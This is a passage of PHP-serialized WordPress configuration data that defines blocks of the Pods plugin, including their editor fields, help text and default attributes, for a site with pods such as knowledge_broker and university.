Caching\";s:5:\"value\";s:4:\"none\";}}s:7:\"expires\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:300;}}s:10:\"transforms\";a:1:{s:4:\"from\";a:1:{i:0;a:4:{s:4:\"type\";s:9:\"shortcode\";s:3:\"tag\";s:4:\"pods\";s:10:\"attributes\";a:18:{s:4:\"name\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"name\";}s:8:\"template\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:8:\"template\";}s:15:\"template_custom\";a:3:{s:4:\"type\";s:7:\"content\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:15:\"template_custom\";}s:14:\"content_before\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:14:\"content_before\";}s:13:\"content_after\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:13:\"content_after\";}s:9:\"not_found\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:9:\"not_found\";}s:5:\"limit\";a:3:{s:4:\"type\";s:7:\"integer\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:5:\"limit\";}s:7:\"orderby\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:7:\"orderby\";}s:5:\"where\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:5:\"where\";}s:10:\"pagination\";a:3:{s:4:\"type\";s:7:\"boolean\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:10:\"pagination\";}s:19:\"pagination_location\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:19:\"pagination_location\";}s:15:\"pagination_type\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:15:\"pagination_type\";}s:14:\"filters_enable\";a:3:{s:4:\"type\";s:7:\"boolean\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:14:\"filters_enable\";}s:7:\"filters\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:7:\"filters\";}s:13:\"filters_label\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:13:\"filters_label\";}s:16:\"filters_location\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:16:\"filters_location\";}s:10:\"cache_mode\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:10:\"cache_mode\";}s:7:\"expires\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:7:\"expires\";}}s:13:\"isMatchConfig\";a:4:{i:0;a:2:{s:4:\"name\";s:4:\"slug\";s:8:\"excluded\";b:1;}i:1;a:2:{s:4:\"name\";s:5:\"field\";s:8:\"excluded\";b:1;}i:2;a:2:{s:4:\"name\";s:4:\"form\";s:8:\"excluded\";b:1;}i:3;a:2:{s:4:\"name\";s:4:\"view\";s:8:\"excluded\";b:1;}}}}}}i:2;a:15:{s:9:\"blockName\";s:28:\"pods/pods-block-related-list\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:22:\"Pods Related Item List\";s:11:\"description\";s:32:\"List multiple related Pod items.\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:4:{i:0;s:4:\"pods\";i:1;s:7:\"related\";i:2;s:4:\"item\";i:3;s:4:\"list\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:2:{i:0;s:8:\"postType\";i:1;s:6:\"postId\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:21:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:39:\"Defaults to using the current pod item.\";s:5:\"label\";s:10:\"Slug or ID\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:4:\"slug\";}i:3;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:51:\"This is the related field name you want to display.\";s:5:\"label\";s:18:\"Related Field Name\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:13:\"related_field\";}i:4;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Template\";s:7:\"options\";a:3:{i:0;a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:26:\"knowledge-brokers-template\";s:5:\"value\";s:26:\"knowledge-brokers-template\";}i:2;a:2:{s:5:\"label\";s:25:\"project-resource-template\";s:5:\"value\";s:25:\"project-resource-template\";}}s:4:\"help\";s:168:\"You can choose a previously saved Pods Template here. We recommend saving your Pods Templates with our Templates component so you can enjoy the full editing experience.\";s:5:\"label\";s:8:\"Template\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:8:\"template\";}i:5;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:149:\"You can specify a custom template to use, it accepts HTML and magic tags. Any content here will override whatever Template you may have chosen above.\";s:5:\"label\";s:15:\"Custom Template\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:15:\"template_custom\";}i:6;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:247:\"This content will appear before the list of templated items. A useful way to use this option is if you have a template that uses \"li\" HTML tags, you can use the \"ul\" HTML tag to start an unordered list. This will only be shown if items were found.\";s:5:\"label\";s:19:\"Content Before List\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:14:\"content_before\";}i:7;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:245:\"This content will appear after the list of templated items. A useful way to use this option is if you have a template that uses \"li\" HTML tags, you can use the \"/ul\" HTML tag to end an unordered list. This will only be shown if items were found.\";s:5:\"label\";s:18:\"Content After List\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:13:\"content_after\";}i:8;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:77:\"If there are no items shown, this content will be shown in the block\'s place.\";s:5:\"label\";s:17:\"Not Found Content\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"string\";s:7:\"default\";s:21:\"No content was found.\";}s:4:\"name\";s:9:\"not_found\";}i:9;a:4:{s:4:\"type\";s:13:\"NumberControl\";s:12:\"fieldOptions\";a:5:{s:18:\"isShiftStepEnabled\";b:0;s:9:\"shiftStep\";b:0;s:4:\"step\";i:1;s:4:\"help\";s:346:\"Specify the number of items to show but keep in mind that the more items you show the longer it may take for the page to load. You should avoid using \"-1\" here unless you know what you\'re doing. If your pod has many items, it could stop the page from loading and cause errors. Default number of items to show is to show 15 items. See also: find()\";s:5:\"label\";s:5:\"Limit\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:15;}s:4:\"name\";s:5:\"limit\";}i:10;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:256:\"You can specify what field to order by here. That could be t.post_title ASC or you may want to use a custom field like my_field.meta_value ASC. The normal MySQL syntax works here, so you can sort ascending with ASC or descending with DESC. See also: find()\";s:5:\"label\";s:8:\"Order By\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:7:\"orderby\";}i:11;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:290:\"You can specify what field to restrict the item list by here. That could be t.post_title LIKE \"%repairs%\" or you may want to reference a custom field like  my_field.meta_value = \"123\". For a list of all things available for you to query, follow the find() Notation Options. See also: find()\";s:5:\"label\";s:5:\"Where\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:5:\"where\";}i:12;a:4:{s:4:\"type\";s:15:\"CheckboxControl\";s:12:\"fieldOptions\";a:3:{s:7:\"heading\";s:17:\"Enable Pagination\";s:5:\"label\";s:3:\"Yes\";s:4:\"help\";s:116:\"Whether to show pagination for the list of items. This will only show if there is more than one page of items found.\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:4:\"name\";s:10:\"pagination\";}i:13;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:19:\"Pagination Location\";s:7:\"options\";a:3:{i:0;a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}i:1;a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}i:2;a:2:{s:5:\"label\";s:21:\"Before and After list\";s:5:\"value\";s:4:\"both\";}}s:4:\"help\";s:36:\"The location to show the pagination.\";s:5:\"label\";s:19:\"Pagination Location\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:4:\"name\";s:19:\"pagination_location\";}i:14;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:15:\"Pagination Type\";s:7:\"options\";a:4:{i:0;a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}i:1;a:2:{s:5:\"label\";s:28:\"Previous and Next Links only\";s:5:\"value\";s:6:\"simple\";}i:2;a:2:{s:5:\"label\";s:64:\"Use an unordered list with paginate_links() native functionality\";s:5:\"value\";s:4:\"list\";}i:3;a:2:{s:5:\"label\";s:47:\"Use basic paginate_links() native functionality\";s:5:\"value\";s:8:\"paginate\";}}s:4:\"help\";s:43:\"Choose which kind of pagination to display.\";s:5:\"label\";s:15:\"Pagination Type\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}}s:4:\"name\";s:15:\"pagination_type\";}i:15;a:4:{s:4:\"type\";s:15:\"CheckboxControl\";s:12:\"fieldOptions\";a:3:{s:7:\"heading\";s:14:\"Enable Filters\";s:5:\"label\";s:3:\"Yes\";s:4:\"help\";s:46:\"Whether to show filters for the list of items.\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:4:\"name\";s:14:\"filters_enable\";}i:16;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:115:\"Comma-separated list of fields you want to allow filtering by. Default is to just show a text field to search with.\";s:5:\"label\";s:13:\"Filter Fields\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:7:\"filters\";}i:17;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:55:\"The label to show for the filters. Default is \"Search\".\";s:5:\"label\";s:20:\"Custom Filters Label\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:13:\"filters_label\";}i:18;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:16:\"Filters Location\";s:7:\"options\";a:2:{i:0;a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}i:1;a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:4:\"help\";s:33:\"The location to show the filters.\";s:5:\"label\";s:16:\"Filters Location\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}}s:4:\"name\";s:16:\"filters_location\";}i:19;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:10:\"Cache Mode\";s:7:\"options\";a:4:{i:0;a:2:{s:5:\"label\";s:15:\"Disable Caching\";s:5:\"value\";s:4:\"none\";}i:1;a:2:{s:5:\"label\";s:12:\"Object Cache\";s:5:\"value\";s:5:\"cache\";}i:2;a:2:{s:5:\"label\";s:9:\"Transient\";s:5:\"value\";s:9:\"transient\";}i:3;a:2:{s:5:\"label\";s:14:\"Site Transient\";s:5:\"value\";s:14:\"site-transient\";}}s:4:\"help\";s:34:\"The mode to cache the output with.\";s:5:\"label\";s:10:\"Cache Mode\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:15:\"Disable Caching\";s:5:\"value\";s:4:\"none\";}}s:4:\"name\";s:10:\"cache_mode\";}i:20;a:4:{s:4:\"type\";s:13:\"NumberControl\";s:12:\"fieldOptions\";a:5:{s:18:\"isShiftStepEnabled\";b:0;s:9:\"shiftStep\";b:0;s:4:\"step\";i:1;s:4:\"help\";s:48:\"Set how long to cache the output for in seconds.\";s:5:\"label\";s:7:\"Expires\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:300;}s:4:\"name\";s:7:\"expires\";}}s:10:\"attributes\";a:26:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"slug\";a:1:{s:4:\"type\";s:6:\"string\";}s:13:\"related_field\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"template\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:15:\"template_custom\";a:1:{s:4:\"type\";s:6:\"string\";}s:14:\"content_before\";a:1:{s:4:\"type\";s:6:\"string\";}s:13:\"content_after\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"not_found\";a:2:{s:4:\"type\";s:6:\"string\";s:7:\"default\";s:21:\"No content was found.\";}s:5:\"limit\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:15;}s:7:\"orderby\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"where\";a:1:{s:4:\"type\";s:6:\"string\";}s:10:\"pagination\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:19:\"pagination_location\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:15:\"pagination_type\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}}s:14:\"filters_enable\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:7:\"filters\";a:1:{s:4:\"type\";s:6:\"string\";}s:13:\"filters_label\";a:1:{s:4:\"type\";s:6:\"string\";}s:16:\"filters_location\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}}s:10:\"cache_mode\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:15:\"Disable Caching\";s:5:\"value\";s:4:\"none\";}}s:7:\"expires\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:300;}}s:10:\"transforms\";a:0:{}}i:3;a:15:{s:9:\"blockName\";s:22:\"pods/pods-block-single\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:16:\"Pods Single Item\";s:11:\"description\";s:26:\"Display a single Pod item.\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:4:{i:0;s:4:\"pods\";i:1;s:6:\"single\";i:2;s:4:\"item\";i:3;s:5:\"field\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:2:{i:0;s:8:\"postType\";i:1;s:6:\"postId\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:5:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:39:\"Defaults to using the current pod item.\";s:5:\"label\";s:10:\"Slug or ID\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:4:\"slug\";}i:3;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Template\";s:7:\"options\";a:3:{i:0;a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:26:\"knowledge-brokers-template\";s:5:\"value\";s:26:\"knowledge-brokers-template\";}i:2;a:2:{s:5:\"label\";s:25:\"project-resource-template\";s:5:\"value\";s:25:\"project-resource-template\";}}s:4:\"help\";s:168:\"You can choose a previously saved Pods Template here. We recommend saving your Pods Templates with our Templates component so you can enjoy the full editing experience.\";s:5:\"label\";s:8:\"Template\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:8:\"template\";}i:4;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:149:\"You can specify a custom template to use, it accepts HTML and magic tags. Any content here will override whatever Template you may have chosen above.\";s:5:\"label\";s:15:\"Custom Template\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:15:\"template_custom\";}}s:10:\"attributes\";a:10:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"slug\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"template\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:15:\"template_custom\";a:1:{s:4:\"type\";s:6:\"string\";}}s:10:\"transforms\";a:1:{s:4:\"from\";a:1:{i:0;a:4:{s:4:\"type\";s:9:\"shortcode\";s:3:\"tag\";s:4:\"pods\";s:10:\"attributes\";a:4:{s:4:\"name\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"name\";}s:4:\"slug\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"slug\";}s:8:\"template\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:8:\"template\";}s:15:\"template_custom\";a:3:{s:4:\"type\";s:7:\"content\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:15:\"template_custom\";}}s:13:\"isMatchConfig\";a:17:{i:0;a:2:{s:4:\"name\";s:5:\"field\";s:8:\"excluded\";b:1;}i:1;a:2:{s:4:\"name\";s:4:\"form\";s:8:\"excluded\";b:1;}i:2;a:2:{s:4:\"name\";s:4:\"view\";s:8:\"excluded\";b:1;}i:3;a:2:{s:4:\"name\";s:14:\"content_before\";s:8:\"excluded\";b:1;}i:4;a:2:{s:4:\"name\";s:13:\"content_after\";s:8:\"excluded\";b:1;}i:5;a:2:{s:4:\"name\";s:9:\"not_found\";s:8:\"excluded\";b:1;}i:6;a:2:{s:4:\"name\";s:5:\"limit\";s:8:\"excluded\";b:1;}i:7;a:2:{s:4:\"name\";s:7:\"orderby\";s:8:\"excluded\";b:1;}i:8;a:2:{s:4:\"name\";s:5:\"where\";s:8:\"excluded\";b:1;}i:9;a:2:{s:4:\"name\";s:10:\"pagination\";s:8:\"excluded\";b:1;}i:10;a:2:{s:4:\"name\";s:19:\"pagination_location\";s:8:\"excluded\";b:1;}i:11;a:2:{s:4:\"name\";s:15:\"pagination_type\";s:8:\"excluded\";b:1;}i:12;a:2:{s:4:\"name\";s:7:\"filters\";s:8:\"excluded\";b:1;}i:13;a:2:{s:4:\"name\";s:13:\"filters_label\";s:8:\"excluded\";b:1;}i:14;a:2:{s:4:\"name\";s:16:\"filters_location\";s:8:\"excluded\";b:1;}i:15;a:2:{s:4:\"name\";s:10:\"cache_mode\";s:8:\"excluded\";b:1;}i:16;a:2:{s:4:\"name\";s:7:\"expires\";s:8:\"excluded\";b:1;}}}}}}i:4;a:15:{s:9:\"blockName\";s:34:\"pods/pods-block-single-list-fields\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:30:\"Pods Single Item - List Fields\";s:11:\"description\";s:37:\"Display fields for a single Pod 